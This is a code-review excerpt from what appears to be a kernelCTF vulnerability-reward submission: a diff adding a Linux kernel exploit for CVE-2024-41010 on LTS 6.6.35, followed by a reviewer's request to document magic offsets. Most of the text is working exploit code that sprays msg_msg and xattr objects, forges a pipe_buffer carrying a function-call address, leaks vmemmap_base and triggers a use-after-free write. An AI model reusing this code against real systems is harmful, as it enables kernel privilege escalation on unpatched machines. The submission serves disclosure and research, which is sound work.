pocs/linux/kernelctf/CVE-2024-41010_lts/exploit/lts-6.6.35/exploit.c

```diff
@@ -0,0 +1,871 @@
+	char buffer[0x2000] = {0};
+
+	struct pipe_buffer *fake_pipebuf = fake_pipe_buffer(fake_page, 0x0, 0x0, fake_ops, 0x10, 0x40);
+	((uint64_t *)buffer)[0] = call_func_addr;
+	memcpy(buffer + 0x20, fake_pipebuf, sizeof(struct pipe_buffer));
+
+	for (int i = 0; i < cnt; i++) {
+		int msqid = alloc_msg_queue();
+
+		spray_qids[i] = msqid;
+		insert_msg_msgseg(msqid, MTYPE_PRIMARY, MSG_MSGSEG_KMALLOC_CG_64, MSG_MSGSEG_KMALLOC_CG_64, buffer);
+	}
+}
+
+uint64_t read_msgmsg_for_leak_vmemmap_base(uint64_t cnt) {
+	uint64_t vmemmap_base = 0;
+
+	for(int i=0; i < cnt; i++)
+	{
+		char *buf = read_msg_msgseg(spray_qids[i], MTYPE_PRIMARY, MSG_MSGSEG_KMALLOC_CG_64);
+
+		if( (((uint64_t *)(buf))[4] >> 48) == 0xffff)
+		{
+			vmemmap_base = ((uint64_t *)(buf))[4];
+			break;
+		}
+	}
+	return vmemmap_base;
+}
+
+void cleanup()
+{
+	char file_name[FILENAME_LEN];
+	int fd = remove(XATTR_FILE);
+	if(fd < 0)
+		panic("remove");
+
+    for (uint64_t i = prefix_spray_cnt; i < prefix_spray_cnt + THIRD_SPRAY_SZ; i++) {
+        snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i);
+		int fd = remove(file_name);
+		if(fd < 0)
+			panic("remove");
+
+    }
+}
+
+void cleanup2(int except)
+{
+	if(prefix_spray_cnt == 0)
+		prefix_spray_cnt += THIRD_SPRAY_SZ;
+	else
+		prefix_spray_cnt += THIRD_SPRAY_SZ - FIRST_SPRAY_SZ;
+}
+
+void cleanup_cg_192()
+{
+	char file_name[FILENAME_LEN];
+	char value_name[XATTR_VALUE_KMALLOC_CG_8K] = {0, };
+    char attribute_name[XATTR_VALUE_KMALLOC_CG_8K];
+
+	for (uint64_t i = 0x1000; i < FIRST_SPRAY_SZ; i++) {
+		snprintf(file_name, FILENAME_LEN, "%s-%08d", XATTR_FILE, i);
+        snprintf(value_name, VALUE_NAME_LEN, "security.value%05lu-%s", i, XATTR_PADDING_STR);
+		snprintf(attribute_name, ATTRIBUTE_NAME_LEN, "security.attr%26lu-%s", 9, XATTR_PADDING_STR);
+		create_xattr(file_name, attribute_name, value_name, XATTR_VALUE_KMALLOC_CG_192, true);
+    }
+}
+
+int run(void)
+{
+	pid_t pid;
+	int pip1[2], pip2[2], pip3[2];
+	char step[10];
+	uint64_t handle_num;
+	int p1;
+	int status1;
+	pthread_t hdr1;
+
+	passer = 0;
+
+	struct regs *sr = save_state();
+
+	pipe(pip1);
+	pipe(pip2);
+	pipe(pip3);
+
+	if(!fork())
+		exit(0);
+
+	cpu_affinity(0);
+	pre_make_mount_dir(TMPFS_MOUNT_POINT);
+	pre_make_xattr_file(XATTR_FILE, 0x10000);
+
+	if (!fork())
+		trigger_uaf_write(pip1, pip2, 0);
+
+	uint64_t *leaks = trigger_spray_chunks(pip1, pip2);
+
+	for(int i=0; i<0x500; i++)
+		release_pipe(glb_pipes[i]);
+
+	if (!leaks)
+	{
+		printf("[-] fail on get xattr node info, cleanup it\n");
+		cleanup();
+		return -1;
+	}
+
+	uint64_t lnode = 0, rnode = 0, attr_name_ptr = 0;
+
+	typedef struct {
+		struct simple_xattr xattr;
+		int fname_idx;
+	} xattr_node_leak;
+
+	xattr_node_leak nodes[0x4000/(0x40/0x8)];
+	int nodes_cnt = 0, nodes_front = 0;
+	for(int i=0; i < 0x4000/(0x40/0x8); i+=0x40/0x8)
+	{
+		if(leaks[0x17 + i] == 0x59 && leaks[0x14 + i] && leaks[0x15 + i] && leaks[0x16 + i] && leaks[0x18 + i])
```

Comment:
Comment here what are you checking and which objects which fields are you reading here with `0x17` or where this comes from?

See more details in our new (still draft) [style guide](https://google.github.io/security-research/kernelctf/style_guide#sprayed-and-leaked-structures).